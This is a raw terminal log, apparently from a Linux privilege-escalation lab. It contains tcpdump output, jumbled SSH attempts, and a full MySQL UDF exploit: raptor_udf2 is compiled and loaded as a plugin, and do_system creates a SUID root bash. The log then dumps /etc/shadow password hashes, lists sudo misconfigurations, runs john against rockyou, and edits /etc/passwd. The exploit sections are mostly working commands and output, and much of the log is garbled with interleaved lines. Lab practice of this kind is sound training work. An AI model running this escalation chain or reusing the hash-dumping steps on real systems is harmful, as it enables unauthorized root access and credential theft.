16700:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
168 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
16900:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
170 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
17100:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
172 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
17300:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
174 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
17500:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
176 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
17700:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
178 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
17900:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
180 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
18100:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
182 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
183^Cssh user@10.10.170.166
184
185
186
187
188
189Owner@DESKTOP-8DUSIOO ~
190$ ssh user@10.10.170.166
191ssh: connect to host 10.10.170.166 port 22: Connection timed out
192
193Owner@DESKTOP-8DUSIOO ~
194$ ssh 10.10.170.166
195The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
196blished.
197RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
198Ank.
199Are you sure you want to continue connecting (yes/no)? yes
200Warning: Permanently added '10.10.170.166' (RSA) to the list of known
201Owner@DESKTOP-8DUSIOO ~
202$ ssh 10.10.170.166
203The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
204RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
205Are you sure you want to continue connecting (yes/no)? yes
206Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
207owner@10.10.170.166's password:
208Permission denied, please try again.
209owner@10.10.170.166's password:
210Permission denied, please try again.
211owner@10.10.170.166's password:
212$ ssh 10.10.170.1666K0s
213Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
214$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
215ame 10.10.170.166:22: No such host is known.
216Owner@DESKTOP-8DUSIOO ~
217Owner@DESKTOP-8DUSIOO ~6 22
218$ 6 22
219ser@10user@10.10.170.166's passwor
220d:
221bash: 22: command not found
222Owner@DESKTOP-8DUSIOO ~
223Owner@DESKTOP-8DUSIOO ~6 22
224$ 6 220.10.170.1
22566's puser@10.10.170.166's password:
226owner@10.10.170.166's password:
227user@10.10.170.166's password:
228Owner@DESKTOP-8DUSIOO ~ound
229$ ssh 10.10.Ku
230Owner@DESKTOP- ~
231Owner@DESKTOP-8DUSIOO ~
232$ ssh user@10.10.170.166 22
233user@10.10.170.166's password:
234bash: 22: command not found
235bash: 22: command not found
236Owner@DESKTOP-8DUSIOO ~
237$ ssh user@10.10.170.166
238$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
239password:
240Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
241
242The programs included with the Debian GNU/Linux system are free software;
243the exact distribution terms for each program are described in the
244individual files in /usr/share/doc/*/copyright.
245
246Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
247permitted by applicable law.
248Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
249user@debian:~$ id
250uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
251dev)
252user@debian:~$ ls
253myvpn.ovpn tools
254user@debian:~$ cd tools/
255user@debian:~/tools$ ls
256kernel-exploits mysql-udf nginx privesc-scripts sudo suid
257user@debian:~/tools$ cd mysql-udf/
258user@debian:~/tools/mysql-udf$ ls
259raptor_udf2.c
260user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
261user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
262.o -lc
263top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
264Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
265Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
266Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
267Swap: 901112k total, 0k used, 901112k free, 54236k cached
268
269 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
270 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
271 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
272 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
273 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
274 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
275 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
276 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
277 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
278 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
279 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
280 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
281 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
282 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
283 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
284 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
285 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
286 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
287 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
288 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
289 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
290 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
291 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
292 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
293 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
294 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
295 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
296 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
297 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
298 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
299 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
300 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
301 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
302 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
303 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
304 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
305 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
306 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
307 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
308 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
309 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
310 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
311 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
312 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
313 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
314 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
315 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
316 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
317 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
318 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
319 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
320 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
321 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
322user@debian:~/tools/mysql-udf$ use mysql;
323-bash: use: command not found
324user@debian:~/tools/mysql-udf$ mysql -u root
325Welcome to the MySQL monitor. Commands end with ; or \g.
326Your MySQL connection id is 36
327Server version: 5.1.73-1+deb6u1 (Debian)
328
329Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
330
331Oracle is a registered trademark of Oracle Corporation and/or its
332affiliates. Other names may be trademarks of their respective
333owners.
334
335Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
336
337mysql> use mysql;
338Reading table information for completion of table and column names
339You can turn off this feature to get a quicker startup with -A
340
341Database changed
342mysql> create table foo(line blob);
343Query OK, 0 rows affected (0.00 sec)
344
345mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
346Query OK, 1 row affected (0.00 sec)
347
348mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
349Query OK, 1 row affected (0.00 sec)
350
351mysql> create function do_system returns integer soname 'raptor_udf2.so';
352Query OK, 0 rows affected (0.00 sec)
353
354mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
355+------------------------------------------------------------------+
356| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
357+------------------------------------------------------------------+
358| 0 |
359+------------------------------------------------------------------+
3601 row in set (0.00 sec)
361
362mysql> /q
363 -> exit
364 -> /quit
365 -> ^CCtrl-C -- exit!
366Aborted
367user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
368rootbash-4.1# id
369uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
370(dip),44(video),46(plugdev),1000(user)
371rootbash-4.1# cat /etc/shadow
372root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
37317298:0:99999:7:::
374daemon:*:17298:0:99999:7:::
375bin:*:17298:0:99999:7:::
376sys:*:17298:0:99999:7:::
377sync:*:17298:0:99999:7:::
378games:*:17298:0:99999:7:::
379man:*:17298:0:99999:7:::
380lp:*:17298:0:99999:7:::
381mail:*:17298:0:99999:7:::
382news:*:17298:0:99999:7:::
383uucp:*:17298:0:99999:7:::
384proxy:*:17298:0:99999:7:::
385www-data:*:17298:0:99999:7:::
386backup:*:17298:0:99999:7:::
387list:*:17298:0:99999:7:::
388irc:*:17298:0:99999:7:::
389gnats:*:17298:0:99999:7:::
390nobody:*:17298:0:99999:7:::
391libuuid:!:17298:0:99999:7:::
392Debian-exim:!:17298:0:99999:7:::
393sshd:*:17298:0:99999:7:::
394user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
39517298:0:99999:7:::
396statd:*:17299:0:99999:7:::
397mysql:!:18133:0:99999:7:::
398rootbash-4.1# cat /etc/passwd
399root:x:0:0:root:/root:/bin/bash
400daemon:x:1:1:daemon:/usr/sbin:/bin/sh
401bin:x:2:2:bin:/bin:/bin/sh
402sys:x:3:3:sys:/dev:/bin/sh
403sync:x:4:65534:sync:/bin:/bin/sync
404games:x:5:60:games:/usr/games:/bin/sh
405man:x:6:12:man:/var/cache/man:/bin/sh
406lp:x:7:7:lp:/var/spool/lpd:/bin/sh
407mail:x:8:8:mail:/var/mail:/bin/sh
408news:x:9:9:news:/var/spool/news:/bin/sh
409uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
410proxy:x:13:13:proxy:/bin:/bin/sh
411www-data:x:33:33:www-data:/var/www:/bin/sh
412backup:x:34:34:backup:/var/backups:/bin/sh
413list:x:38:38:Mailing List Manager:/var/list:/bin/sh
414irc:x:39:39:ircd:/var/run/ircd:/bin/sh
415gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
416nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
417libuuid:x:100:101::/var/lib/libuuid:/bin/sh
418Debian-exim:x:101:103::/var/spool/exim4:/bin/false
419sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
420user:x:1000:1000:user,,,:/home/user:/bin/bash
421statd:x:103:65534::/var/lib/nfs:/bin/false
422mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
423rootbash-4.1# cat /etc/hosts
424127.0.0.1 localhost
425127.0.1.1 debian.localdomain debian
426
427# The following lines are desirable for IPv6 capable hosts
428::1 ip6-localhost ip6-loopback
429fe00::0 ip6-localnet
430ff00::0 ip6-mcastprefix
431ff02::1 ip6-allnodes
432ff02::2 ip6-allrouters
433rootbash-4.1# ls -l /etc/shadow
434-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
435rootbash-4.1# cat /etc/shadow
436root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
43717298:0:99999:7:::
438daemon:*:17298:0:99999:7:::
439bin:*:17298:0:99999:7:::
440sys:*:17298:0:99999:7:::
441sync:*:17298:0:99999:7:::
442games:*:17298:0:99999:7:::
443man:*:17298:0:99999:7:::
444lp:*:17298:0:99999:7:::
445mail:*:17298:0:99999:7:::
446news:*:17298:0:99999:7:::
447uucp:*:17298:0:99999:7:::
448proxy:*:17298:0:99999:7:::
449www-data:*:17298:0:99999:7:::
450backup:*:17298:0:99999:7:::
451list:*:17298:0:99999:7:::
452irc:*:17298:0:99999:7:::
453gnats:*:17298:0:99999:7:::
454nobody:*:17298:0:99999:7:::
455libuuid:!:17298:0:99999:7:::
456Debian-exim:!:17298:0:99999:7:::
457sshd:*:17298:0:99999:7:::
458user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
45917298:0:99999:7:::
460statd:*:17299:0:99999:7:::
461mysql:!:18133:0:99999:7:::
462rootbash-4.1# wget
463wget: missing URL
464Usage: wget [OPTION]... [URL]...
465
466Try ‘wget --help’ for more options.
467rootbash-4.1# pwd
468/home/user/tools/mysql-udf
469rootbash-4.1# ls
470raptor_udf2.c raptor_udf2.o raptor_udf2.so
471rootbash-4.1# cd ..
472rootbash-4.1# ls
473kernel-exploits mysql-udf nginx privesc-scripts sudo suid
474rootbash-4.1# cd ..
475rootbash-4.1# ls
476myvpn.ovpn tools
477rootbash-4.1# cd tools/
478rootbash-4.1# ls
479kernel-exploits mysql-udf nginx privesc-scripts sudo suid
480rootbash-4.1# cd privesc-scripts/
481rootbash-4.1# ls
482LinEnum.sh linpeas.sh lse.sh
483rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
484login as: user
485user@10.10.170.166's password:
486Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
487
488The programs included with the Debian GNU/Linux system are free software;
489the exact distribution terms for each program are described in the
490individual files in /usr/share/doc/*/copyright.
491
492Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
493permitted by applicable law.
494Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
495user@debian:~$ cd /home/user/tools/mysql.udf
496-bash: cd: /home/user/tools/mysql.udf: No such file or directory
497user@debian:~$ ls
498myvpn.ovpn tools
499user@debian:~$ cd tools/
500user@debian:~/tools$ ls
501kernel-exploits mysql-udf nginx privesc-scripts sudo suid
502user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
503gcc: raptor_udf2.c: No such file or directory
504gcc: no input files
505user@debian:~/tools$ cd mysql-udf/
506user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
507user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
508gcc: unrecognized option '-soname,'
509gcc: unrecognized option '-1c'
510user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
511gcc: unrecognized option '-soname,'
512user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
513user@debian:~/tools/mysql-udf$ mysql -u root
514Welcome to the MySQL monitor. Commands end with ; or \g.
515Your MySQL connection id is 37
516Server version: 5.1.73-1+deb6u1 (Debian)
517
518Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
519
520Oracle is a registered trademark of Oracle Corporation and/or its
521affiliates. Other names may be trademarks of their respective
522owners.
523
524Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
525
526mysql> use mysql;
527Reading table information for completion of table and column names
528You can turn off this feature to get a quicker startup with -A
529
530Database changed
531mysql> create table bmillakid(line blob);
532Query OK, 0 rows affected (0.00 sec)
533
534mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
535Query OK, 1 row affected (0.00 sec)
536
537mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
538ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
539mysql> exit
540Bye
541user@debian:~/tools/mysql-udf$ who am i
542user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
543user@debian:~/tools/mysql-udf$ links
544-bash: links: command not found
545user@debian:~/tools/mysql-udf$ lynx
546-bash: lynx: command not found
547user@debian:~/tools/mysql-udf$ wget
548wget: missing URL
549Usage: wget [OPTION]... [URL]...
550
551Try ‘wget --help’ for more options.
552user@debian:~/tools/mysql-udf$ cat /etc/shadow
553root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
554daemon:*:17298:0:99999:7:::
555bin:*:17298:0:99999:7:::
556sys:*:17298:0:99999:7:::
557sync:*:17298:0:99999:7:::
558games:*:17298:0:99999:7:::
559man:*:17298:0:99999:7:::
560lp:*:17298:0:99999:7:::
561mail:*:17298:0:99999:7:::
562news:*:17298:0:99999:7:::
563uucp:*:17298:0:99999:7:::
564proxy:*:17298:0:99999:7:::
565www-data:*:17298:0:99999:7:::
566backup:*:17298:0:99999:7:::
567list:*:17298:0:99999:7:::
568irc:*:17298:0:99999:7:::
569gnats:*:17298:0:99999:7:::
570nobody:*:17298:0:99999:7:::
571libuuid:!:17298:0:99999:7:::
572Debian-exim:!:17298:0:99999:7:::
573sshd:*:17298:0:99999:7:::
574user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
575statd:*:17299:0:99999:7:::
576mysql:!:18133:0:99999:7:::
577bmillakid:!:18645:0:99999:7:::
578user@debian:~/tools/mysql-udf$ cat /etc/passwd
579root:x:0:0:root:/root:/bin/bash
580daemon:x:1:1:daemon:/usr/sbin:/bin/sh
581bin:x:2:2:bin:/bin:/bin/sh
582sys:x:3:3:sys:/dev:/bin/sh
583sync:x:4:65534:sync:/bin:/bin/sync
584games:x:5:60:games:/usr/games:/bin/sh
585man:x:6:12:man:/var/cache/man:/bin/sh
586lp:x:7:7:lp:/var/spool/lpd:/bin/sh
587mail:x:8:8:mail:/var/mail:/bin/sh
588news:x:9:9:news:/var/spool/news:/bin/sh
589uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
590proxy:x:13:13:proxy:/bin:/bin/sh
591www-data:x:33:33:www-data:/var/www:/bin/sh
592backup:x:34:34:backup:/var/backups:/bin/sh
593list:x:38:38:Mailing List Manager:/var/list:/bin/sh
594irc:x:39:39:ircd:/var/run/ircd:/bin/sh
595gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
596nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
597libuuid:x:100:101::/var/lib/libuuid:/bin/sh
598Debian-exim:x:101:103::/var/spool/exim4:/bin/false
599sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
600user:x:1000:1000:user,,,:/home/user:/bin/bash
601statd:x:103:65534::/var/lib/nfs:/bin/false
602mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
603bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
604user@debian:~/tools/mysql-udf$ ls -la user
605ls: cannot access user: No such file or directory
606user@debian:~/tools/mysql-udf$ pwd
607/home/user/tools/mysql-udf
608user@debian:~/tools/mysql-udf$ who am i
609user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
610user@debian:~/tools/mysql-udf$ whoami
611user
612user@debian:~/tools/mysql-udf$ ls -la /
613total 96
614drwxr-xr-x 22 root root 4096 Aug 25 2019 .
615drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
616drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
617drwxr-xr-x 3 root root 4096 May 12 2017 boot
618drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
619drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
620drwxr-xr-x 3 root root 4096 May 15 2017 home
621lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
622drwxr-xr-x 12 root root 12288 May 14 2017 lib
623lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
624drwx------ 2 root root 16384 May 12 2017 lost+found
625drwxr-xr-x 3 root root 4096 May 12 2017 media
626drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
627drwxr-xr-x 2 root root 4096 May 12 2017 opt
628dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
629drwx------ 5 root root 4096 May 15 2020 root
630drwxr-xr-x 2 root root 4096 May 13 2017 sbin
631drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
632drwxr-xr-x 2 root root 4096 May 12 2017 srv
633drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
634drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
635drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
636drwxr-xr-x 11 root root 4096 May 13 2017 usr
637drwxr-xr-x 14 root root 4096 May 13 2017 var
638lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
639user@debian:~/tools/mysql-udf$ whoami
640user
641user@debian:~/tools/mysql-udf$ sudo -l
642Matching Defaults entries for user on this host:
643 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
644
645User user may run the following commands on this host:
646 (root) NOPASSWD: /usr/sbin/iftop
647 (root) NOPASSWD: /usr/bin/find
648 (root) NOPASSWD: /usr/bin/nano
649 (root) NOPASSWD: /usr/bin/vim
650 (root) NOPASSWD: /usr/bin/man
651 (root) NOPASSWD: /usr/bin/awk
652 (root) NOPASSWD: /usr/bin/less
653 (root) NOPASSWD: /usr/bin/ftp
654 (root) NOPASSWD: /usr/bin/nmap
655 (root) NOPASSWD: /usr/sbin/apache2
656 (root) NOPASSWD: /bin/more
657user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
658root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
659user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
660-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
661user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
662Warning: truncating password to 8 characters
6635v3Bvw7Nf6Zbs
664user@debian:~/tools/mysql-udf$
665user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
666-bash: 5v3Bvw7Nf6Zbs: command not found
667user@debian:~/tools/mysql-udf$ nano /etc/passwd
668user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
669rootbash-4.1# su newroot
670Unknown id: newroot
671rootbash-4.1# whoami
672root
673rootbash-4.1# cat /etc/passwd
674root:x:0:0:root:/root:/bin/bash
675daemon:x:1:1:daemon:/usr/sbin:/bin/sh
676bin:x:2:2:bin:/bin:/bin/sh
677sys:x:3:3:sys:/dev:/bin/sh
678sync:x:4:65534:sync:/bin:/bin/sync
679games:x:5:60:games:/usr/games:/bin/sh
680man:x:6:12:man:/var/cache/man:/bin/sh
681lp:x:7:7:lp:/var/spool/lpd:/bin/sh
682mail:x:8:8:mail:/var/mail:/bin/sh
683news:x:9:9:news:/var/spool/news:/bin/sh
684uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
685proxy:x:13:13:proxy:/bin:/bin/sh
686www-data:x:33:33:www-data:/var/www:/bin/sh
687backup:x:34:34:backup:/var/backups:/bin/sh
688list:x:38:38:Mailing List Manager:/var/list:/bin/sh
689irc:x:39:39:ircd:/var/run/ircd:/bin/sh
690gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
691nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
692libuuid:x:100:101::/var/lib/libuuid:/bin/sh
693Debian-exim:x:101:103::/var/spool/exim4:/bin/false
694sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
695user:x:1000:1000:user,,,:/home/user:/bin/bash
696statd:x:103:65534::/var/lib/nfs:/bin/false
697mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
698bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
699rootbash-4.1# su root
700Password:
701su: Authentication failure
702rootbash-4.1# exit
703exit
704user@debian:~/tools/mysql-udf$ sudo -l
705Matching Defaults entries for user on this host:
706 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
707
708User user may run the following commands on this host:
709 (root) NOPASSWD: /usr/sbin/iftop
710 (root) NOPASSWD: /usr/bin/find
711 (root) NOPASSWD: /usr/bin/nano
712 (root) NOPASSWD: /usr/bin/vim
713 (root) NOPASSWD: /usr/bin/man
714 (root) NOPASSWD: /usr/bin/awk
715 (root) NOPASSWD: /usr/bin/less
716 (root) NOPASSWD: /usr/bin/ftp
717 (root) NOPASSWD: /usr/bin/nmap
718 (root) NOPASSWD: /usr/sbin/apache2
719 (root) NOPASSWD: /bin/more
720user@debian:~/tools/mysql-udf$ cat /etc/crontab
721# /etc/crontab: system-wide crontab
722# Unlike any other crontab you don't have to run the `crontab'
723# command to install the new version when you edit this file
724# and files in /etc/cron.d. These files also have username fields,
725# that none of the other crontabs do.
726
727SHELL=/bin/sh
728PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
729
730# m h dom mon dow user command
73117 * * * * root cd / && run-parts --report /etc/cron.hourly
73225 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
